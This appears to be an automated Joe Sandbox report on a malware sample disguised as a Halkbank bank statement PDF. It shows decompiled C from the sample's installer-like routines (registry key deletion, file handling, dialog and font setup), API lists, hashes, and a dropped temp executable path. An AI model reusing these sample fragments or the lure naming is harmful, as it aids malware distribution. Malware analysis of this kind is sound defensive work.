                                                                    0x00402969
                                                                    0x0040296d
                                                                    0x0040296d
                                                                    0x00402973
                                                                    0x00402980
                                                                    0x00402988
                                                                    0x0040298b
                                                                    0x00402997
                                                                    0x0040299a
                                                                    0x004029a0
                                                                    0x004029ae
                                                                    0x004029b3
                                                                    0x004029b7
                                                                    0x004029ba
                                                                    0x004029c3
                                                                    0x004029cf
                                                                    0x004029d3
                                                                    0x004029d6
                                                                    0x004029e0
                                                                    0x004029ff
                                                                    0x004029e7
                                                                    0x004029ec
                                                                    0x004029f4
                                                                    0x004029f7
                                                                    0x004029fc
                                                                    0x004029fc
                                                                    0x00402a06
                                                                    0x00402a06
                                                                    0x00402a13
                                                                    0x00402a19
                                                                    0x00402a1f
                                                                    0x00402a1f
                                                                    0x004029b7
                                                                    0x00402a33
                                                                    0x00402a35
                                                                    0x00402a35
                                                                    0x00402a3f
                                                                    0x00402a40
                                                                    0x00402a44
                                                                    0x00402a48
                                                                    0x00402a4e
                                                                    0x00402a4e
                                                                    0x00402a55
                                                                    0x004022f1
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                    • GlobalFree.KERNEL32 ref: 00402A06
                                                                    • GlobalFree.KERNEL32 ref: 00402A19
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                    				char _v68;
                                                                    				char _v132;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t23;
                                                                    				signed int _t24;
                                                                    				void* _t31;
                                                                    				void* _t33;
                                                                    				void* _t34;
                                                                    				void* _t44;
                                                                    				signed int _t46;
                                                                    				signed int _t50;
                                                                    				signed int _t52;
                                                                    				signed int _t53;
                                                                    				signed int _t55;
                                                                    
                                                                    				_t23 = _a16;
                                                                    				_t53 = _a12;
                                                                    				_t44 = 0xffffffdc;
                                                                    				if(_t23 == 0) {
                                                                    					_push(0x14);
                                                                    					_pop(0);
                                                                    					_t24 = _t53;
                                                                    					if(_t53 < 0x100000) {
                                                                    						_push(0xa);
                                                                    						_pop(0);
                                                                    						_t44 = 0xffffffdd;
                                                                    					}
                                                                    					if(_t53 < 0x400) {
                                                                    						_t44 = 0xffffffde;
                                                                    					}
                                                                    					if(_t53 < 0xffff3333) {
                                                                    						_t52 = 0x14;
                                                                    						asm("cdq");
                                                                    						_t24 = 1 / _t52 + _t53;
                                                                    					}
                                                                    					_t25 = _t24 & 0x00ffffff;
                                                                    					_t55 = _t24 >> 0;
                                                                    					_t46 = 0xa;
                                                                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                    				} else {
                                                                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                    					_t50 = 0;
                                                                    				}
                                                                    				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                    				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                    				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                    				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                    				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                    			}



















                                                                    0x00404e7a
                                                                    0x00404e7f
                                                                    0x00404e87
                                                                    0x00404e88
                                                                    0x00404e95
                                                                    0x00404e9d
                                                                    0x00404e9e
                                                                    0x00404ea0
                                                                    0x00404ea2
                                                                    0x00404ea4
                                                                    0x00404ea7
                                                                    0x00404ea7
                                                                    0x00404eae
                                                                    0x00404eb4
                                                                    0x00404eb4
                                                                    0x00404ebb
                                                                    0x00404ec2
                                                                    0x00404ec5
                                                                    0x00404ec8
                                                                    0x00404ec8
                                                                    0x00404ecc
                                                                    0x00404edc
                                                                    0x00404ede
                                                                    0x00404ee1
                                                                    0x00404e8a
                                                                    0x00404e8a
                                                                    0x00404e91
                                                                    0x00404e91
                                                                    0x00404ee9
                                                                    0x00404ef4
                                                                    0x00404f0a
                                                                    0x00404f1b
                                                                    0x00404f37

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                    • wsprintfW.USER32 ref: 00404F1B
                                                                    • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$H7B
                                                                    • API String ID: 3540041739-107966168
                                                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 48%
                                                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				short _v536;
                                                                    				void* _t27;
                                                                    				signed int _t33;
                                                                    				intOrPtr* _t35;
                                                                    				signed int _t45;
                                                                    				signed int _t46;
                                                                    				signed int _t47;
                                                                    
                                                                    				_t46 = _a12;
                                                                    				_t47 = _t46 & 0x00000300;
                                                                    				_t45 = _t46 & 0x00000001;
                                                                    				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                    				if(_t27 == 0) {
                                                                    					if((_a12 & 0x00000002) == 0) {
                                                                    						L3:
                                                                    						_push(0x105);
                                                                    						_push( &_v536);
                                                                    						_push(0);
                                                                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                    							__eflags = _t45;
                                                                    							if(__eflags != 0) {
                                                                    								L10:
                                                                    								RegCloseKey(_v8);
                                                                    								return 0x3eb;
                                                                    							}
                                                                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                    							__eflags = _t33;
                                                                    							if(_t33 != 0) {
                                                                    								break;
                                                                    							}
                                                                    							_push(0x105);
                                                                    							_push( &_v536);
                                                                    							_push(_t45);
                                                                    						}
                                                                    						RegCloseKey(_v8);
                                                                    						_t35 = E00406A35(3);
                                                                    						if(_t35 != 0) {
                                                                    							return  *_t35(_a4, _a8, _t47, 0);
                                                                    						}
                                                                    						return RegDeleteKeyW(_a4, _a8);
                                                                    					}
                                                                    					_v12 = 0;
                                                                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                    						goto L10;
                                                                    					}
                                                                    					goto L3;
                                                                    				}
                                                                    				return _t27;
                                                                    			}












                                                                    0x00402eb4
                                                                    0x00402ebd
                                                                    0x00402ec6
                                                                    0x00402ed2
                                                                    0x00402edb
                                                                    0x00402ee5
                                                                    0x00402f0a
                                                                    0x00402f10
                                                                    0x00402f15
                                                                    0x00402f16
                                                                    0x00402f46
                                                                    0x00402f1f
                                                                    0x00402f21
                                                                    0x00402f71
                                                                    0x00402f74
                                                                    0x00000000
                                                                    0x00402f7a
                                                                    0x00402f30
                                                                    0x00402f35
                                                                    0x00402f37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f3f
                                                                    0x00402f44
                                                                    0x00402f45
                                                                    0x00402f45
                                                                    0x00402f52
                                                                    0x00402f5a
                                                                    0x00402f61
                                                                    0x00000000
                                                                    0x00402f8a
                                                                    0x00000000
                                                                    0x00402f69
                                                                    0x00402ef5
                                                                    0x00402f08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f08
                                                                    0x00402f90

                                                                    APIs
                                                                    • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00401D81(void* __ebx, void* __edx) {
                                                                    				struct HWND__* _t30;
                                                                    				WCHAR* _t38;
                                                                    				void* _t48;
                                                                    				void* _t53;
                                                                    				signed int _t55;
                                                                    				signed int _t60;
                                                                    				long _t63;
                                                                    				void* _t65;
                                                                    
                                                                    				_t53 = __ebx;
                                                                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                    				} else {
                                                                    					E00402D84(2);
                                                                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                    				}
                                                                    				_t55 =  *(_t65 - 0x24);
                                                                    				 *(_t65 + 8) = _t30;
                                                                    				_t60 = _t55 & 0x00000004;
                                                                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                    				if((_t55 & 0x00010000) == 0) {
                                                                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                    				} else {
                                                                    					_t38 = E00402DA6(0x11);
                                                                    				}
                                                                    				 *(_t65 - 0x44) = _t38;
                                                                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                    				asm("sbb esi, esi");
                                                                    				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                    					DeleteObject(_t48);
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                    					_push(_t63);
                                                                    					E004065AF();
                                                                    				}
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                    				return 0;
                                                                    			}











                                                                    0x00401d81
                                                                    0x00401d85
                                                                    0x00401d9a
                                                                    0x00401d87
                                                                    0x00401d89
                                                                    0x00401d8f
                                                                    0x00401d8f
                                                                    0x00401da0
                                                                    0x00401da3
                                                                    0x00401dad
                                                                    0x00401db0
                                                                    0x00401db8
                                                                    0x00401dc9
                                                                    0x00401dcc
                                                                    0x00401dd7
                                                                    0x00401dce
                                                                    0x00401dd0
                                                                    0x00401dd0
                                                                    0x00401ddb
                                                                    0x00401de5
                                                                    0x00401e0c
                                                                    0x00401e1b
                                                                    0x00401e29
                                                                    0x00401e31
                                                                    0x00401e39
                                                                    0x00401e39
                                                                    0x00401e42
                                                                    0x00401e48
                                                                    0x00402ba4
                                                                    0x00402ba4
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00401E4E(intOrPtr __edx) {
                                                                    				void* __edi;
                                                                    				int _t9;
                                                                    				signed char _t15;
                                                                    				struct HFONT__* _t18;
                                                                    				intOrPtr _t30;
                                                                    				void* _t31;
                                                                    				struct HDC__* _t33;
                                                                    				void* _t35;
                                                                    
                                                                    				_t30 = __edx;
                                                                    				_t33 = GetDC( *(_t35 - 8));
                                                                    				_t9 = E00402D84(2);
                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                    				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                    				ReleaseDC( *(_t35 - 8), _t33);
                                                                    				 *0x40ce08 = E00402D84(3);
                                                                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                    				 *0x40ce0f = 1;
                                                                    				 *0x40ce0c = _t15 & 0x00000001;
                                                                    				 *0x40ce0d = _t15 & 0x00000002;
                                                                    				 *0x40ce0e = _t15 & 0x00000004;
                                                                    				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                    				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                    				_push(_t18);
                                                                    				_push(_t31);
                                                                    				E004065AF();
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                    				return 0;
                                                                    			}











                                                                    0x00401e4e
                                                                    0x00401e59
                                                                    0x00401e5b
                                                                    0x00401e68
                                                                    0x00401e7f
                                                                    0x00401e84
                                                                    0x00401e91
                                                                    0x00401e96
                                                                    0x00401e9a
                                                                    0x00401ea5
                                                                    0x00401eac
                                                                    0x00401ebe
                                                                    0x00401ec4
                                                                    0x00401ec9
                                                                    0x00401ed3
                                                                    0x00402638
                                                                    0x0040156d
                                                                    0x00402ba4
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E51
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                    • ReleaseDC.USER32 ref: 00401E84
                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2584051700-0
                                                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E00401C43(intOrPtr __edx) {
                                                                    				int _t29;
                                                                    				long _t30;
                                                                    				signed int _t32;
                                                                    				WCHAR* _t35;
                                                                    				long _t36;
                                                                    				int _t41;
                                                                    				signed int _t42;
                                                                    				int _t46;
                                                                    				int _t56;
                                                                    				intOrPtr _t57;
                                                                    				struct HWND__* _t63;
                                                                    				void* _t64;
                                                                    
                                                                    				_t57 = __edx;
                                                                    				_t29 = E00402D84(3);
                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                    				 *(_t64 - 0x18) = _t29;
                                                                    				_t30 = E00402D84(4);
                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                    				 *(_t64 + 8) = _t30;
                                                                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                    				}
                                                                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                    					 *(_t64 + 8) = E00402DA6(0x44);
                                                                    				}
                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                    				_push(1);
                                                                    				if(__eflags != 0) {
                                                                    					_t61 = E00402DA6();
                                                                    					_t32 = E00402DA6();
                                                                    					asm("sbb ecx, ecx");
                                                                    					asm("sbb eax, eax");
                                                                    					_t35 =  ~( *_t31) & _t61;
                                                                    					__eflags = _t35;
                                                                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                    					goto L10;
                                                                    				} else {
                                                                    					_t63 = E00402D84();
                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                    					_t41 = E00402D84(2);
                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                    					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                    					if(__eflags == 0) {
                                                                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                    						L10:
                                                                    						 *(_t64 - 0x38) = _t36;
                                                                    					} else {
                                                                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                    						asm("sbb eax, eax");
                                                                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                    					}
                                                                    				}
                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                    					_push( *(_t64 - 0x38));
                                                                    					E004065AF();
                                                                    				}
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                    				return 0;
                                                                    			}















                                                                    0x00401c43
                                                                    0x00401c45
                                                                    0x00401c4c
                                                                    0x00401c4f
                                                                    0x00401c52
                                                                    0x00401c5c
                                                                    0x00401c60
                                                                    0x00401c63
                                                                    0x00401c6c
                                                                    0x00401c6c
                                                                    0x00401c6f
                                                                    0x00401c73
                                                                    0x00401c7c
                                                                    0x00401c7c
                                                                    0x00401c7f
                                                                    0x00401c83
                                                                    0x00401c85
                                                                    0x00401cda
                                                                    0x00401cdc
                                                                    0x00401ce7
                                                                    0x00401cf1
                                                                    0x00401cf4
                                                                    0x00401cf4
                                                                    0x00401cfd
                                                                    0x00000000
                                                                    0x00401c87
                                                                    0x00401c8e
                                                                    0x00401c90
                                                                    0x00401c93
                                                                    0x00401c99
                                                                    0x00401ca0
                                                                    0x00401ca3
                                                                    0x00401ccb
                                                                    0x00401d03
                                                                    0x00401d03
                                                                    0x00401ca5
                                                                    0x00401cb3
                                                                    0x00401cbb
                                                                    0x00401cbe
                                                                    0x00401cbe
                                                                    0x00401ca3
                                                                    0x00401d06
                                                                    0x00401d09
                                                                    0x00401d0f
                                                                    0x00402ba4
                                                                    0x00402ba4
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
